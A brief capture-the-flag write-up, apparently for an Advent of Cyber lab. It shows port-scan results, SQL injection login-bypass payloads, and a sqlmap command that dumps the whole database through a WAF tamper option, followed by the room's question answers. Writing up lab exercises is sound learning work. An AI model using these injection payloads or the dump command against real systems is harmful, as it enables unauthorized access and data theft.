AoC Day5
nmap
22
3000 http
3306 mysql
8000 http
1' AND 1=1 --+
Santa reads some documentation that he wrote when setting up the application. It reads:
"Santa's TODO: Look at alternative database systems that are better than sqlite. Also, don't forget that you installed a Web Application Firewall (WAF) after last year's attack. In case you've forgotten the command, you can tell SQLMap to try and bypass the WAF by using --tamper=space2comment"
From this we know the DBMS is SQLite (--dbms sqlite) and that --tamper=space2comment is needed for the WAF.
After bypassing the /santapanel login via ' OR 1=1 --+, capture the request using Burp Suite and save it (as panel-request):
sqlmap -r panel-request --dbms sqlite --dump-all --tamper=space2comment
Task
- Without using directory brute forcing, what’s Santa’s secret login panel?
  /santapanel -via HINT & guessing {tried gobuster but no result :D}
- Visit Santa’s secret login panel and bypass the login using SQLi
  username : ' OR 1=1 --+ password : ' OR 1=1 --+
- How many entries are there in the gift database?
  22
- What did Paul ask for?
  Github Ownership
- What is the flag?
  [redacted challenge flag]
- What is the admin’s password?
  [redacted sensitive answer]